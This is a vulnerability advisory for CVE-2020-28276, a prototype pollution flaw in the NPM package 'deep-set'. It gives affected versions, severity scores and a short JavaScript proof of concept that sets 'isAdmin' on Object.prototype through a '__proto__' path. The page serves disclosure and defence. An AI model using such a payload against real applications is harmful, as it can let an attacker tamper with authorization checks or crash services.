CVE-2020-28276
Prototype pollution vulnerability in 'deep-set'
Description
The NPM module 'deep-set' is vulnerable to prototype pollution because its `deepSet()` function does not check the type of the object before assigning a value to the property named by the path. Due to this flaw, an attacker who controls the path can create a non-existent property or manipulate an existing one on `Object.prototype`, which leads to denial of service or potentially remote code execution.
PoC
```js
var deepSet = require('deep-set')
var obj = {'1':'2'}
console.log(obj.isAdmin);                    // undefined: obj has no such property
deepSet(obj, '__proto__.isAdmin', 'true')    // walks into Object.prototype and sets isAdmin there
console.log(obj.isAdmin);                    // 'true': inherited from the polluted Object.prototype
```
How to fix CVE-2020-28276
No fixed version has been published yet. Mitigate by removing the affected package or applying upstream guidance from the references below.
Is CVE-2020-28276 being exploited?
Low — EPSS is 2.9%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- deep-set: >= 1.0.0, <= 1.0.1
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL 9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |